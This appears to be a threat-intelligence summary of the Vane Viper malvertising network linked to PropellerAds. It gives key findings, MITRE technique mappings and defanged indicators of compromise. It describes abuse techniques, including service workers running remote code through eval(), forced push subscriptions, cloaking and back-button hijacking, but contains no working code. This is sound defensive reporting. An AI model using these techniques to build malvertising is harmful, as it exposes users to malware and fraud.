Vane Viper — an adtech ecosystem centered on AdTech Holding and PropellerAds — operates a large, resilient malvertising and ad-fraud network using traffic distribution systems (TDS), push-notification abuse, service-worker script chaining, and thousands of short-lived domains to deliver malware, fraudulent downloads, and persistent unwanted notifications. Investigation links Vane Viper infrastructure to PropellerAds, URL Solutions/Pananames, Webzilla/XBT, and related actors, showing shared IP space, registrar bulk registrations, and organizational ties that enable plausible deniability and large-scale abuse. #VaneViper #PropellerAds
Keypoints
- Vane Viper (AdTech Holding/PropellerAds) has appeared in ~50% of observed customer networks and produced ~1 trillion DNS queries in a year, leveraging ~60,000 known domains.
- Evidence indicates PropellerAds-operated infrastructure (TDS and specific /24 address space) served as an origin for multiple malvertising and ad-fraud campaigns, though direct personnel direction was not independently proven.
- Operator techniques include abusing push notifications via malicious service workers, script chaining with eval(), cloaking, geofencing, anti-adblock toggles, and dynamic redirects to funnel victims to malware, fake downloads, and scams.
- Corporate and infrastructure links tie PropellerAds and AdTech Holding to URL Solutions/Pananames (registrar), Webzilla/XBT (hosting/ASN overlap), and associated executives, revealing opaque ownership and bulk domain registration behavior that aids evasion.
- Specific campaigns delivered Android Triada trojans, malicious APKs, browser trojans (Browserknock/knock function), fake software download pages (Opera impersonation), forced push-subscription gates, and delivery of malicious browser extensions and survey/scam pages.
- Registrar URL Solutions ranks highly in bulk domain registrations; Vane Viper accounts for nearly half of URL Solutions’ bulk events since Jan 2023, showing systematic mass registration to sustain domain churn and resilience to takedowns.
- Historical context ties XBT/Webzilla address space to prior large-scale fraud and disinformation (Methbot, Doppelgänger, piracy sites), strengthening the pattern of repeated abuse across the shared ecosystem.
MITRE Techniques
- [T1222] File and Directory Permissions Modification – Service workers and push notification scripts modify client-side behaviors and persist via browser-based permissions; quoted behavior: ‘…service workers and script chaining to abuse push notifications…’
- [T1059] Command and Scripting Interpreter – Use of eval() in service workers to execute remote code in page context: ‘…A service worker’s use of “eval()” to execute any content fetched from a remote URL…’
- [T1189] Drive-by Compromise – TDS-driven redirects and cloaking deliver malware and APKs to victims without explicit safe interaction: ‘…TDSs can route users to a virtually unlimited number of downstream landing pages…’
- [T1204] User Execution – Push notification permission prompts and click-anywhere overlays coercing users to accept or click: ‘…page forcing the user to accept push notifications… a full-screen transparent tag overlays the page, ensuring any user click redirects to a payload URL.’
- [T1608] Stage Capabilities – Use of persistent push notifications and service workers to maintain long-term access and repeated delivery of malicious content: ‘…These push notifications… grant persistence on an endpoint if they’re accepted by the user…’
- [T1071] Application Layer Protocol – JSON-based TDS C2 files guiding redirect behavior and campaign toggles delivered over HTTP(S): ‘…the TDS command-and-control (C2) server returns a JSON file that guides further behavior…’
- [T1566] Phishing – Fake software download pages (Opera impersonation) and survey scams used to trick users into installing malware or unwanted software: ‘…landing page masquerades as a download step… Every call to action links to ninoglostoay[.]com…’
- [T1490] Inhibit System Recovery – Browser history poisoning and back-button hijacking to prevent easy exit from malicious pages: ‘…the page poisons the browser history and hijacks the back button, preventing users from leaving the page…’
Indicators of Compromise
- [Domain ] Malicious campaign infrastructure and push services – visionedmisfocusedpanfry[.]com (Triada APK drop), in-page-push[.]com, inpagepush[.]com
- [Domain ] Persistent push/monitoring domains linked to Vane Viper – omnatuor[.]com, propeller-tracking[.]com
- [IP Address ] Hosting/ASN and tenant mapping – 188.42.160.55 (landingpane[.]com hosted here; /24 assigned to PropellerAds via Webzilla AS), and 188.42.160.0/24 (PropellerAds assigned block)
- [Malware/File ] Malware samples and labels – Triada malicious APK (VirusTotal sample referenced), Browserknock-labeled file (VirusTotal entry referencing knock function)
- [Registrar/Bulk registration ] Registrar tied to mass domain churn – URL Solutions / Pananames bulk registration events (Vane Viper accounts for nearly half of URL Solutions bulk events since Jan 2023)